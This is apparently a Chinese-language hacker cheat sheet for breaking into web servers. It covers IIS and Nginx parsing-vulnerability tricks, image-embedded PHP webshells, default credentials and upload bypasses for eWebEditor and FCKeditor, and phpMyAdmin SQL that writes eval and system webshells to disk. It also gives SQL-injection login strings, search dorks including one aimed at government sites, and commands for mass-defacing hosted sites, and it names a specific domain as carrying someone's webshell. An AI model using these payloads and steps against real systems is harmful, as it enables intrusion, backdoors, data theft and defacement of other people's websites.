【 解析漏洞总结 】

IIS 6.0

目录解析：/xx.asp/xx.jpg  xx.jpg可替换为任意文本文件(e.g. xx.txt)，文本内容为后门代码

IIS6.0 会将 xx.jpg 解析为 asp 文件。

后缀解析：/xx.asp;.jpg     /xx.asp:.jpg(此处需抓包修改文件名)

IIS6.0 都会把此类后缀文件成功解析为 asp 文件。

默认解析：/xx.asa    /xx.cer   /xx.cdx

IIS6.0 默认的可执行文件除了 asp 还包含这三种

此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

 

IIS 7.0/IIS 7.5/Nginx <8.03

在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。

常用利用方法： 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后，避免破坏图片文件头和尾 

e.g.  

copy xx.jpg/b + yy.txt/a xy.jpg

/b 即二进制[binary]模式

/a 即ascii模式 xx.jpg正常图片文件 

yy.txt 内容 <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件

找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址，在地址后加上 /xx.php 即可执行恶意文本。

.然后就在图片目录下生成一句话木马 shell.php 密码 cmd

=============================================================================================================================================================

【 ewebeditor编辑器 】

默认后台：ewebeditor/admin_login.asp

帐号密码：admin admin

样式设计：ewebeditor/admin_style.asp

查看版本：ewebeditor/dialog/about.html

数据库路径：db/ewebeditor.mdb    db/%23ewebeditor.mdb    db/%23ewebeditor.asp  ewebeditor/db/!@#ewebeditor.asp (用谷歌语法找文件名)

遍历目录：ewebeditor/admin/upload.asp?id=16&amp;d_viewmode=&amp;dir =../..

跳转目录：ewebeditor/admin_uoloadfile.asp？id=14&dir=..  (dir为列目录, ..为返回上层目录)，形式:dir ../.. 

点上传文件管理-随便选择一个样式目录，得到：ewindoweditor/admin_uoloadfile.asp?id=14 在id=14后面加&dir=../../../.. 就可看到整个网站的文件了(../自己加减)

 

( ewebeditor5.5版本 )

默认后台：ewebeditor/admin/login.asp

帐号密码：admin  198625

数据库路径：data/%23sze7xiaohu.mdb

遍历目录：ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

调用样式上传页面：ewebeditor/ewebeditor.htm?id=body&style=popup

 

( ewebeditor3.8 php版本 )

默认后台：eWebEditor/admin/login.php

首先随便输入一个帐号和密码，接着系统会提示出错，这时清空浏览器的url，然后输入以下代码后连按三次回车键：

javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));  

接着访问文件：ewebeditor/admin/default.php  就可以直接进入后台了。

 

( ewebeditor编辑器exp手册 )

有时候什么后缀都上传了，还是不行。就增加一个asp:jpg格式 上传asp:jpg 试试

一：文件上传成功了，但是访问不成功，说明该目录(比如：/UploadFile)被设置了权限，返回去换成/ 上传到根目录就行了.增加asp等不行的时候，可以利用解析asp;jpg

 

二：下载数据库查看前人留下的痕迹，再访问上传页面拿shell。

页面路径：/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已添加asp|asa|cer|php的栏目，把S_ID跟S_Name的值替换在语句里访问，上传相对应的格式木马。

 

=============================================================================================================================================================

【 fckeditor编辑器 】

查看版本：fckeditor/editor/dialog/fck_about.html         

编辑器页面：FCKeditor/_samples/default.html

上传页面：fckeditor/editor/filemanager/connectors/test.html

遍历目录：FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

编辑页面：fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

查看文件上传路径：fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

 

( 拿shell方法总结 )

ASPX的站几乎都用fck编辑器，建议用工具扫一下，记住inc目录下可能存在fck编辑器，扫下这个目录。

一：如果是iis6.0，上传两次 1.asp;.jpg 或者1.asp;1.jpg 或者创建x.asp目录，再在这个目录下上传x.jpg 或者直接上传1.asp;jpg 都可以完美解析拿下shell

二：第一次上传1.asp;1.jpg，被重命名为：1_asp;1.jpg，但是第二次上传1.asp;1.jpg，就有可能变成：1.asp;1(1).jpg

三：iis7.5+fck的解析文件为：a.aspx.a;.a.aspx.jpg..jpg.aspx

四：如果不是iis6.0 上传1.asp;jpg然后抓包，接下来改包，将分号变成空格，再用c32把20改成00，保存，利用%00 截断分号两次

五：成功访问别人的一句话木马页面，https://glavesoft.com/UploadFiles\EditorFile\file/2.asp;2(1).jpg  但不知道密码

https://glavesoft.com/UploadFiles\EditorFile\file\2_asp;2.jpg 这个是图片木马，没有成功利用iis6.0解析漏洞还是图片，下载下来用记事本打开找到密码。

六：IIS7.0/7.5 通杀oday，把php一句话木马后缀改成1.jpg传上去，找出一句话的路径后，在1.jpg的后面添加/.php  例如：https://www.xxx.com/iges/php.jpg/.php

 

( 建立文件夹 . 变 _ 的突破方法 )

利用Fiddler web debugger 这款工具来进行修改数据包，从而达到突破的目的。

注意：安装Fiddler web debugger，需要安装.net环境以及.net的SP2补丁方可运行！

1.打开fck的上传页面，例如：fckeditor/editor/filemanager/browser/default/connectors/test.html

2.再打开Fiddler web debugger这款工具，点击设置--自动断点--选择 “请求之前”

3.接着打开fck的上传页面，创建文件夹，并输入你想要创建的文件名，例如：x.asp

4.然后返回到Fiddler web debugger这款工具里，选择链接--点击右侧的嗅探

5.修改currentfolder内的参数，改成你要建立的文件夹名字，如：x.asp

6.然后点击右侧的：run to completion

7.再点击软件设置--自动断点--禁用，再到浏览器里点击确定建立文件夹，你就会发现文件夹建立为x.asp了

=============================================================================================================================================================

 

【 linux 】

解析格式：1.php.xxx (xxx可以是任意) 

如果apache不认识后缀为rar的文件，我们就用1.php.rar格式上传，文件就会被服务器当做PHP脚本解析。

辨别linux系统方法，例如：https://www.xxx.com/xxx/abc.asp?id=125 把b换成大写B访问，如果出错了，就说明是linux系统，反之是windows系统.

=============================================================================================================================================================

【 旁注 】

旁注的技巧就是挑选支持aspx的站来日，这样提权时候希望较大，如何探测服务器上哪些站点支持aspx呢? 利用bing搜索：https://cn.bing.com/ 搜索格式：ip:服务器ip aspx

比如要入侵一个网站，想知道该网站支不支持aspx，就在网站后面随便加上一个xxx.aspx回车，如果显示的不是iis默认的错误页面，而是这种：“/”应用程序中的服务器错误，说明支持aspx马。

=============================================================================================================================================================

【 phpmyadmin 】

查看版本：test.php 或 phpinfo.php

默认账号密码：root root

万能帐号密码：'localhost'@'@" 密码空

拿shell第一种方法：

CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );

INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');

SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/darkmoon.php';

DROP TABLE IF EXISTS `darkmoon`;

 

拿shell第二种方法：

Create TABLE moon (darkmoon text NOT NULL);

Insert INTO moon (darkmoon) VALUES('<?php @eval($_POST[pass]);?>');

select darkmoon from moon into outfile 'd:/wamp/www/darkmoon2.php';

Drop TABLE IF EXISTS moon;

 

拿shell第三种方法：

select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/darkmoon3.php'

 

拿shell第四种方法

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/wamp/www/darkmoon4.php'

127.0.0.1/darkmoon4.php?cmd=net user

找到mysql数据库，执行sql语句即可写入一句话，再菜刀连接即可。

phpmyadmin脱裤：在这里面是可以直接拖库的，如同上传php拖库脚本一样，操作差不多的。

 

修改mysql默认的root用户名方法:

进入phpmyadmin,进入mysql表,执行sql语句

1.update user set user='你的新root用户名' where user='root';  

2.flush privileges; 

例如：

用root身份登入，进入mysql库，修改user表即可。

1.use mysql;  

2.  

3.mysql>update user set user='newName' where user='root';  

4.  

5.mysql> flush privileges;   

=============================================================================================================================================================

【 万能密码 】

( php )

帐号：' UNION Select 1,1,1 FROM admin Where ''='

密码：1

( asp )

'xor

'or'='or'

'or''=''or''='

'or '1'='1'or '1'='1

'or 1=1/*

=============================================================================================================================================================

【 批量关键词 】

inurl:asp?id=

inurl:detail.php?

CompHonorBig.asp?id=           牛比

inurl:show.asp? 非常强大！！！！

site:www.yuming.com

inurl:articleshow.asp?articleid=数字 牛B

inurl:szwyadmin/login.asp

inurl:asp?id=1 intitle:政府

杭州 inurl:Article_Class2.asp?

=============================================================================================================================================================

【 批量挂黑页 】

cmd命令执行 dir d:\wwwroot /b >>1.txt

之后命令 for /f "tokens=* delims= " %i in (d:\1.txt) do echo pause>>D:\wwwroot\%i\wwwroot\1.txt